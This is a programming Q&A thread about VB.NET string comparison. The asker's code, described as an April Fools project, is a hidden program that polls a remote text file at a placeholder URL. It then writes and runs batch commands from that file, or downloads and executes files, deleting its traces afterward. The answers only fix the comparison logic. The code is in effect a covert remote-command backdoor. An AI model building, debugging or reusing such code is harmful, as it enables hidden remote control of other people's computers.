# VB.NET variable check

Tags: vb.net

This program has a "fl" variable that at a specific point, gets changed to file(0), the first line of the read file. I want to run some stuff when "fl" IS NOT EQUAL to "file(0)". I'm making this for the 1st of April. I'm not the best at this, so I figured to start this early. (CTRL + F for THIS_LINE if you want to find the line that I suppose doesn't work.)

```
Imports System
Imports System.IO
Imports System.Collections
Public Class Form1

    Private Property fl As String

    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        Me.Opacity = 0
        start.Enabled = True
    End Sub

    Private Sub start_Tick(sender As Object, e As EventArgs) Handles start.Tick
        main()
        start.Enabled = False
    End Sub

    Private Sub main()
        ' Preparations
        start.Enabled = False
        Me.Hide()
        Dim stopval As Integer = 0
        Dim failcount As Integer = 0
        If Directory.Exists(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb") = False Then
            My.Computer.FileSystem.CreateDirectory(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\")
        End If
        If File.Exists(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt") Then
            My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt")
        End If
        Dim fl As String = "asd"
        ' Actual stuff that needs to happen
        dlfile.Enabled = True
    End Sub

    Private Sub dlfile_Tick(sender As Object, e As EventArgs) Handles dlfile.Tick
        Try
            My.Computer.Network.DownloadFile("http://sth.sth/v.txt", My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt")
        Catch ex As Exception
            MsgBox("fail")
            Dim asd As Integer = 0
        End Try
        dlsuc()
    End Sub

    Private Sub dlsuc()
        Dim x As Integer = 0
        Threading.Thread.Sleep(3000)
        Dim file_ As String = My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt"
        Dim file As String() = IO.File.ReadAllLines(file_)
        Dim firstline As String = file(0)
        Dim secondline As String = file(1)
        If fl IsNot file(0) Then 'THIS_LINE
            ' Executing the command
            If secondline = "command" Then
                Dim file_name As String = My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat"
                Dim i As Integer
                Dim aryText(3) As String
                aryText(0) = "@echo off"
                aryText(1) = "cls"
                aryText(2) = file(2)
                aryText(3) = "pause"
                Dim objWriter As New System.IO.StreamWriter(file_name)
                For i = 0 To 3
                    objWriter.WriteLine(aryText(i))
                Next
                objWriter.Close()
                Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat")
                Threading.Thread.Sleep(500)
                Do Until x > 49
                    Try
                        My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat")
                    Catch ex As Exception
                        Dim xyz As String = Nothing
                    End Try
                    x = x + 1
                Loop
            End If
            If secondline = "download" Then
                Dim filename As String = file(3)
                My.Computer.Network.DownloadFile(file(2), My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
            End If
            If secondline = "downloadr" Then
                Dim filename As String = file(3)
                My.Computer.Network.DownloadFile(file(2), My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
                Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
            End If
        End If
        ' After executing the given command
        fl = file(0)
        Threading.Thread.Sleep(500)
        My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt")
        file_ = Nothing
        file = Nothing
        firstline = Nothing
        secondline = Nothing
    End Sub
    End Class
```

Update:

Also, do you know why doesn't this work? I trid it with them in one if too:

```
    If Not fl.Equals(file(0)) Or Not fl.Equals("000") Then 

    End If
```

But it's not working

```
Private Sub dlsuc()
    Dim x As Integer = 0
    Threading.Thread.Sleep(3000)
    Dim file_ As String = My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt"
    Dim file As String() = IO.File.ReadAllLines(file_)
    Dim firstline As String = file(0)
    Dim secondline As String = file(1)
    If Not fl.Equals(file(0)) Then 'THIS_LINE
        If Not fl = "000" Then
            ' Executing the command
            If secondline = "command" Then
                Dim file_name As String = My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat"
                Dim i As Integer
                Dim aryText(3) As String
                aryText(0) = "@echo off"
                aryText(1) = "cls"
                aryText(2) = file(2)
                aryText(3) = "pause"
                Dim objWriter As New System.IO.StreamWriter(file_name)
                For i = 0 To 3
                    objWriter.WriteLine(aryText(i))
                Next
                objWriter.Close()
                Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat")
                Threading.Thread.Sleep(500)
                Do Until x > 49
                    Try
                        My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\asdt.bat")
                    Catch ex As Exception
                        Dim xyz As String = Nothing
                    End Try
                    x = x + 1
                Loop
            End If
            If secondline = "download" Then
                Dim filename As String = file(3)
                My.Computer.Network.DownloadFile(file(2), My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
            End If
            If secondline = "downloadr" Then
                Dim filename As String = file(3)
                My.Computer.Network.DownloadFile(file(2), My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
                Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\" & filename)
            End If
        End If
    End If
    ' After executing the given command
    fl = file(0)
    Threading.Thread.Sleep(500)
    My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\hb\v.txt")
    file_ = Nothing
    file = Nothing
    firstline = Nothing
    secondline = Nothing
End Sub
```

Comment: Please [edit] your question title to something more meaningful. The title should describe the problem you're having or question you're asking in a way that will be meaningful to future readers here who see it in a search result. As written, your title has zero relevant information; the fact that it's VB.Net is known from the tags, and that it's not working is clear by the fact you posted here. Thanks.

Answer (score 1, accepted):

Then change this

```
If fl IsNot file(0) Then 'THIS_LINE
```

to

```
If Not fl.Equals(file(0)) Then 'THIS_LINE
```

*Side note:*

You have declared `fl` twice, so if that was not intended, change this

```
Dim fl As String = "asd"`
```

to this

```
fl = "asd"
```

Comment: [`Is` and `IsNot`](https://msdn.microsoft.com/en-us/library/t3bat82c.aspx?f=255&MSPPError=-2147217396) do compare references. `Equals` or just `=` do compare the values. The `Dim` keyword prevents the `fl` property from being assigned the value `"asd"`.

Comment: @paksyh15 Can't see your code for that, but I´m pretty sure you should use `And` instead of `Or`

Comment: If you're talking about the new code I put below, I shouldn't because I want it to stop even if "000" wasn't the previous value, but it currently is.

Comment: No, because in everyday speech too, it means it has to be both of them, not any of them.

Comment: @paksyh15 Yes, it has to be both, where none can be either `file(0)`  or `000` ask you ask `if not`. If you ask `if` then you would use `or` where only one needs to be true to get through.

Comment: @OlivierJacot-Descombes Your are quite right, I will rephrase my answer.

Comment: With And and changing fl to file(0), it works!
If Not fl.Equals(file(0)) And Not file(0) = "000" Then

Comment: Thanks @LGSon! - It was my bad, tho I still don't understand why it's And.

Comment: Thanks @OlivierJacot-Descombes!